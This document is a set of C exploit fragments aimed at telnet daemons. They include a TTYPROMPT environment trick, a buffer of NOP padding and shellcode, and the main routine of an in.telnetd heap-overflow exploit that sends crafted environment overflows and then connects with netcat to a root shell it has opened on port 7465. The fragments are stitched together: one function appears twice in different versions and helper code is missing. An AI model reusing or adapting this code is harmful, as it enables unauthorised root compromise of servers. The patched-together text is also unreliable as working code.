void negotiate(int sd) { wont(sd,TELOPT_TTYPE); wont(sd,TELOPT_NAWS); wont(sd,TELOPT_XDISPLOC); will(sd,TELOPT_LFLOW); will(sd,TELOPT_LINEMODE); wont(sd,TELOPT_OLD_ENVIRON); will(sd,TELOPT_NEW_ENVIRON); will(sd,TELOPT_BINARY); env(sd,"TTYPROMPT","abcdef"); }
void negotiate(int sd) { char buf[1024]; char nop[64]; int len; sendstr(sd, packet_1,sizeof(packet_1)); sleep(2); memset(buf,'\0',sizeof(buf)); memset(nop,'A',sizeof(nop)); memcpy(buf,packet_2,sizeof(packet_2)); /* adding NOP */ memcpy(buf+sizeof(packet_2), nop, sizeof(nop)); /* shellcode */ memcpy(buf+sizeof(packet_2)+sizeof(nop), sc, sizeof(sc)); /* left packet */ memcpy(buf+sizeof(packet_2)+sizeof(nop)+sizeof(sc),packet_2_1,sizeof(packet_2_1)); len = sizeof(packet_2) +sizeof(packet_2_1) + sizeof(nop)+sizeof(sc) ; sendstr(sd, buf, len); sleep(1); /* wont echo */ wont(sd,TELOPT_ECHO); sleep(1); /* do echo */ cmd(sd,TELOPT_ECHO); sleep(2); }
main (int argc, char *argv[]) { int br, l, dosleep = 0; int percent = 0; char spin; unsigned char w; bzero (oldenv, sizeof (oldenv)); argv++; dalen = strlen ("clarity.local"); while (argv[0]) { if (!strcmp (argv[0], "--pause")) dosleep = 1; if (!strcmp (argv[0], "--size") && argv[1]) { mipl = atoi (argv[1]); argv++; } if (!strcmp (argv[0], "--name") && argv[1]) { dalen = strlen (argv[1]); argv++; } argv++; } fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen); if(dalen%3==0) { offsets=offset3; } else { ninbufoffset = mipl % 8192; offsets[11] += 32 * (mipl - ninbufoffset) / 8192; if (offsets[11] > 255) { fprintf (stderr, " ! MiPl too big.", mipl, dalen); exit (1); } } sock_setup (); if (dosleep) { system ("sleep 1;ps aux|grep in.telnetd|grep -v grep"); sleep (8); } dalen += strlen ("\r\n[ : yes]\r\n"); fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n"); fflush (stderr); doo (5); will (39); fflush (dasock); read_sock (); fprintf (stderr, "o Setting up environment vars...\n"); fflush (stderr); will (1); push_clean (); doenv ("USER", "zen-parse"); doenv ("TERM", "zen-parse"); will (39); fflush (dasock); fprintf (stderr, "o Doing overflows...\n"); fflush (stderr); for (br = 0; (offsets[br] || offsets[br + 1]); br += 2) { fill (mipl + ENV + offsets[br], offsets[br + 1]); fflush (dasock); usleep (100000); read_sock (); } fprintf (stderr, "o Overflows done...\n"); fflush (stderr); push_clean (); fprintf (stderr, "o Sending IACs to start login process...\n"); fflush (stderr); wont (24); wont (32); wont (35); fprintf (dasock, "%s", tosend); will (1); push_heap_attack (); sleep (1); fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n"); execlp ("nc", "nc", "-v", "localhost", "7465", 0); fprintf (stderr, "o If the exploit worked, there should be an open port on 7465.\n"); fprintf (stderr, " It is a root shell. You should probably close it.\n"); fflush (stderr); sleep (60); exit (0); }